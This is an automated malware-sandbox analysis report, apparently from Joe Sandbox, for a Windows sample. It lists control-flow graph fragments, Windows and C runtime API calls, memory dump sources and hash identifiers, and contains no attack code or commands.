                                                                                                                                • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 415 40ea0a-40ea16 call 40e8de 417 40ea1b-40ea1f 415->417
                                                                                                                                APIs
                                                                                                                                • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                  • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                  • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                  • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1597249276-0
                                                                                                                                • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                                                                                • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 504 21898a8-2189917 CloseHandle 507 2189919-218991f 504->507 508 2189920-2189945 504->508 507->508
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2243972291.0000000002180000.00000040.00000800.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_2180000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                • Opcode ID: a7ff730021746a0007e3e2fdab0606df4afa8e9e4142ba8b3862276311e0782c
                                                                                                                                • Instruction ID: 072f9eb29781d8e77041eeb929fb65184f350a4107798c668a1dd4390e03983c
                                                                                                                                • Opcode Fuzzy Hash: a7ff730021746a0007e3e2fdab0606df4afa8e9e4142ba8b3862276311e0782c
                                                                                                                                • Instruction Fuzzy Hash: B01128B1D002488BDB10DFAAC5457AEFBF4EF88314F208459D519A7240CB78A944CFA4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2243668441.00000000020DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020DD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_20dd000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 447cb5ca443e7933b2e79b4f3120818651eed6d0f8695520a4381f940d0cc533
                                                                                                                                • Instruction ID: fc1c2c0b8b28833d2cc9779ba778b6c02a9dfd18bdf727e7e85686a9c9ca50ea
                                                                                                                                • Opcode Fuzzy Hash: 447cb5ca443e7933b2e79b4f3120818651eed6d0f8695520a4381f940d0cc533
                                                                                                                                • Instruction Fuzzy Hash: DA012B724063049AE7218B15CD84B67BFDCEFC5324F18C529ED480B246C3799801D6B1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2243668441.00000000020DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020DD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_20dd000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 635450b18eecb864511b0cd2115ab9ee63335e01c4fd074144892011a3c9c3b5
                                                                                                                                • Instruction ID: 95e0da24335165430dbce5dd3ec92b99b1ce4b53a8f8761b9a3d71c985457bf4
                                                                                                                                • Opcode Fuzzy Hash: 635450b18eecb864511b0cd2115ab9ee63335e01c4fd074144892011a3c9c3b5
                                                                                                                                • Instruction Fuzzy Hash: 83015E7240E3C09ED7128B258894B52BFB8EF53224F1985DBD9888F297C2699845D772
                                                                                                                                APIs
                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$@$PA
                                                                                                                                • API String ID: 0-3039612711
                                                                                                                                • Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                                                                                • Instruction ID: 284407f43597d2b1529aa5dbb826e4f49811f0ea4eaa41d9cabafce47d44ff82
                                                                                                                                • Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                                                                                • Instruction Fuzzy Hash: 64E159316083418FC724DF28C58066BB7E1AFD9314F14493EE8C5A7391EB79D949CB8A
                                                                                                                                APIs
                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3859560861-0
                                                                                                                                • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                APIs
                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                                • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2243972291.0000000002180000.00000040.00000800.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_2180000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4']q
                                                                                                                                • API String ID: 0-1259897404
                                                                                                                                • Opcode ID: 9978263b112a46f0132ed03a15e762d5194cc2aabab92b88a31391e09d8dd0d3
                                                                                                                                • Instruction ID: 1b44f3a2d35e4e8a123c44545d33226c36a23012d664cd53a38a89b49b33e6bc
                                                                                                                                • Opcode Fuzzy Hash: 9978263b112a46f0132ed03a15e762d5194cc2aabab92b88a31391e09d8dd0d3
                                                                                                                                • Instruction Fuzzy Hash: 76512F70E402058FD709EF7AE99069ABBE7FBC5300F08C969C004AB368DB756515CF61
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2243972291.0000000002180000.00000040.00000800.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_2180000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4']q
                                                                                                                                • API String ID: 0-1259897404
                                                                                                                                • Opcode ID: 61a6b344d7b2f1e7248583d722826b1622e4ee5bd58055d174b969efa0de6a67
                                                                                                                                • Instruction ID: c915fe41b0f7ed2de5cf27109d007780fbe91c335046805d795941aff13a8216
                                                                                                                                • Opcode Fuzzy Hash: 61a6b344d7b2f1e7248583d722826b1622e4ee5bd58055d174b969efa0de6a67
                                                                                                                                • Instruction Fuzzy Hash: 95510D70E416058FD709EF6BE99069ABBE7FBC9300F08C96AC004AB26CDB756515CF61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                                                                                                • Instruction ID: d5e3495c9826dce769b252ea72d1bcaf7b5d46a24141b332915225fd3cdae7ad
                                                                                                                                • Opcode Fuzzy Hash: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                                                                                                • Instruction Fuzzy Hash: 9852A471A047129FC708CF29C99066AB7E1FF88304F044A3EE896E7B81D739E955CB95
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                                                                                                • Instruction ID: 17d22deff8d32e931318445bbea846c6b698fa6fcc44f6923348d96d7e24b863
                                                                                                                                • Opcode Fuzzy Hash: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                                                                                                • Instruction Fuzzy Hash: 0A329E70A087029FD318CF29C98472AB7E1BF84304F148A3EE89567781D779E955CBDA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                                                                                                • Instruction ID: cc67e10771130af0a5279b37c8f7fa75a2653c997645fd1ae8a0b8309c7f2627
                                                                                                                                • Opcode Fuzzy Hash: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                                                                                                • Instruction Fuzzy Hash: 48E1D6306083514FC708CF28C99456ABBE2EFC5304F198A7EE8D68B386D779D94ACB55
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                                                                                • Instruction ID: 74c1b90a01db230de662c72faab58802bb742d928f34651097fec506a9751401
                                                                                                                                • Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                                                                                • Instruction Fuzzy Hash: 15717072A9155347E39CCF5CECD17763713DBC5351F49C23ACA025B6EAC938A922C688
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                                                                                • Instruction ID: e93c334361593eb17f37b37ed9e80cdb2c00b1b1e1af3e0e9a736190e966ddef
                                                                                                                                • Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                                                                                • Instruction Fuzzy Hash: 4A615E3266055747E391DF6DEEC47663762EBC9351F18C630CA008B6A6CB39B92297CC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                                                                                • Instruction ID: 39afabd8a370e1aacf823bb5b0eb141e0e266d105c364ee31248ba7b153c19f0
                                                                                                                                • Opcode Fuzzy Hash: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                                                                                • Instruction Fuzzy Hash: 2851F94400D7E18EC716873A44E0AA7BFD10FAB115F4E9ACDA5E90B2E3C159C288DB77
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                • Instruction ID: cff114a85fcb8f5deb46d81d22c4208fa3965af46b01a687ebeadebabb5a60ab
                                                                                                                                • Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                • Instruction Fuzzy Hash: 9A31D8302052028BE738CE19C954BEBB3B5AFC0349F44883ED986A73C4DABDD945D795
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000001.00000002.2242354161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242394241.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000001.00000002.2242414215.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_400000_F7Xu8bRnXT.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                                                                                • Instruction ID: 40597224e526abc728bb10992f322fa75c91b34d76fbbe6bc80328d1c420bfc2
                                                                                                                                • Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                                                                                • Instruction Fuzzy Hash: F321923170520247EB68C929C9547ABB3A5ABC0389F48853EC986A73C8DAB9E941D785
                                                                                                                                APIs
                                                                                                                                • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,021318D0), ref: 004170C5
                                                                                                                                • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                • _malloc.LIBCMT ref: 0041718A
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                • _malloc.LIBCMT ref: 0041724C
                                                                                                                                • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                • __freea.LIBCMT ref: 004172A4
                                                                                                                                • __freea.LIBCMT ref: 004172AD
                                                                                                                                • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                • _malloc.LIBCMT ref: 00417362
                                                                                                                                • _memset.LIBCMT ref: 00417384
                                                                                                                                • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                • __freea.LIBCMT ref: 004173CF
                                                                                                                                • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.2242371364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
